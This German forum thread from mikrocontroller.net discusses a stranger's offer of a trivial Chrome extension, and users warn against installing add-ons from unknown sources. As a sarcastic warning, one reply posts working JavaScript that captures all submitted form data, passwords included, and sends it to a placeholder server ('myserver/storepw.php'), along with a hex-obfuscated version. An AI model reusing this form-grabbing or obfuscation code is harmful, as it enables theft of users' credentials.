Forum: PC-Programmierung Chrome Erweiterung


von Mikrocontroller.net Chrome Addon (Gast)


Lesenswert?

Hallo Leute,
ich habe heute angefangen mit der Programmierung von Chrome 
Erweiterungen und Apps. Da ich die Website Mikrocontroller.net sehr 
feiere habe ich eine Erweiterung für alle Chrome Nutzer Programmiert. Im 
Anhang ist die. Zip Datei die ihr bevor ihr sie nutzt noch entpacken 
müsst!

  Wie Installiere ich diese Erweiterung :
ihr geht über die drei Striche oben rechts unter das Menü Weitere Tools 
und danach auf Erweiterungen. Wenn ihr bei den Erweiterungen seid zieht 
ihr die entpackte Datei in das Chrome Fenster. Fertig!

  Wofür ist die Erweiterung ?
Wenn ihr die Erweiterung Installiert habt, seht ihr oben rechts neben 
dem Suchfeld ein Icon, wenn ihr dieses klickt öffnet sich in einem neuen 
Tab die Mikrocontroller.net Website.

Ich würde mich freuen, wenn ihr diese Erweiterung nutzt und mir ein 
kleines Feedback gebt. Wenn ihr irgendwelche Fehler oder Bugs findet 
dann schreibt es mir bitte auch. ;)

Danke

von Rufus Τ. F. (rufus) Benutzerseite


Lesenswert?

Mikrocontroller.net Chrome Addon schrieb:
> Im Anhang ist die. Zip Datei

Da ist kein Anhang. Glücklicherweise.

Wer ist so wahnsinnig, und installiert ein Browser-Addon aus völlig 
unbekannter Quelle?

von Hugo (Gast)


Lesenswert?

Rufus Τ. F. schrieb:
> Wer ist so wahnsinnig, und installiert ein Browser-Addon aus völlig
> unbekannter Quelle?

Vor allem, warum tut es nicht einfach ein Lesezeichen?

von Paul B. (paul_baumann)


Lesenswert?

Mikrocontroller.net Chrome Addon schrieb:
> Wie Installiere ich diese Erweiterung :

Das ist ja schön und gut, wenn Du beschreibst, wie DU die Erweiterung 
installierst. Andere Leute haben aber vielleicht andere Vorgehensweisen.
;-)

MfG Paul

von Justus S. (jussa)


Lesenswert?

Rufus Τ. F. schrieb:
> Wer ist so wahnsinnig, und installiert ein Browser-Addon aus völlig
> unbekannter Quelle?

und dazu noch mit so einer völlig überflüssigen 'Funktion'...

von Daniel A. (daniel-a)


Lesenswert?

Ich würde die Erweiterung herunterladen (um den Quelltext zu Analysieren 
und nach bösartigem code zu suchen).

Mit dem Code kannst du dir die Eingaben zuschicken, die ande...  ähm... 
du in Formularen machst:
1
var url = "https://myserver/storepw.php";
2
addEventListener("submit",function(e){
3
  e = e && e.target;
4
  if(!(e instanceof HTMLFormElement))
5
    return;
6
  var x = new XMLHttpRequest();
7
  x.open("POST",url,true);
8
  x.send(new FormData(e));
9
},true);

Oder wenn nicht gleich jeder den Code lesen können soll:
1
(()=>{var _0xbe6a=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x6D\x79\x73\x65\x72\x76\x65\x72\x2F\x73\x74\x6F\x72\x65\x70\x77\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74","\x74\x61\x72\x67\x65\x74","\x48\x54\x4D\x4C\x46\x6F\x72\x6D\x45\x6C\x65\x6D\x65\x6E\x74","\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x50\x4F\x53\x54","\x6F\x70\x65\x6E","\x46\x6F\x72\x6D\x44\x61\x74\x61","\x73\x65\x6E\x64","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72"];var $=_0xbe6a[0],_=window;_[_0xbe6a[9]](_0xbe6a[1],(_0xb53fx3)=>{_0xb53fx3=_0xb53fx3&&_0xb53fx3[_0xbe6a[2]];if(!(_0xb53fx3 instanceof _[_0xbe6a[3]])){return};var _0xb53fx4= new _[_0xbe6a[4]]();_0xb53fx4[_0xbe6a[6]](_0xbe6a[5],u,true);_0xb53fx4[_0xbe6a[8]]( new _[_0xbe6a[7]](_0xb53fx3))},true);})();

von Kaj (Gast)


Lesenswert?

Wow, ist ja mega spannend...

Oder anders gesagt:
Was macht das Add-On denn sonst noch so?
Wird ja einen Grund geben, weshalb du es nicht über
den offiziellen Weg verteilst...

Sorry, aber wer ein Add-On so verteilt, muss
sich solche Fragen gefallen lassen!

von Daniel A. (daniel-a)


Lesenswert?

Daniel A. schrieb:
> Oder wenn nicht gleich jeder den Code lesen können soll:
Sorry, dort war ein Tippfehler drin, sollte so sein:
1
(()=>{var _0xbe6a=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x6D\x79\x73\x65\x72\x76\x65\x72\x2F\x73\x74\x6F\x72\x65\x70\x77\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74","\x74\x61\x72\x67\x65\x74","\x48\x54\x4D\x4C\x46\x6F\x72\x6D\x45\x6C\x65\x6D\x65\x6E\x74","\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x50\x4F\x53\x54","\x6F\x70\x65\x6E","\x46\x6F\x72\x6D\x44\x61\x74\x61","\x73\x65\x6E\x64","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72"];var $=_0xbe6a[0],_=window;_[_0xbe6a[9]](_0xbe6a[1],(_0xb53fx3)=>{_0xb53fx3=_0xb53fx3&&_0xb53fx3[_0xbe6a[2]];if(!(_0xb53fx3 instanceof _[_0xbe6a[3]]))return;var _0xb53fx4=new _[_0xbe6a[4]]();_0xb53fx4[_0xbe6a[6]](_0xbe6a[5],$,true);_0xb53fx4[_0xbe6a[8]](new _[_0xbe6a[7]](_0xb53fx3))},true);})();

von Floyd S. (floydhd)


Lesenswert?

> Oder wenn nicht gleich jeder den Code lesen können soll:
Wieso sollte er sein Code schützen wollen, wenn er es zu einer frei 
verfügbaren Erweiterung macht und Außerdem will er sicherlich nicht die 
Daten von anderen stehlen.......


;D

: Bearbeitet durch User
Bitte melde dich an um einen Beitrag zu schreiben. Anmeldung ist kostenlos und dauert nur eine Minute.
Bestehender Account
Schon ein Account bei Google/GoogleMail? Keine Anmeldung erforderlich!
Mit Google-Account einloggen
Noch kein Account? Hier anmelden.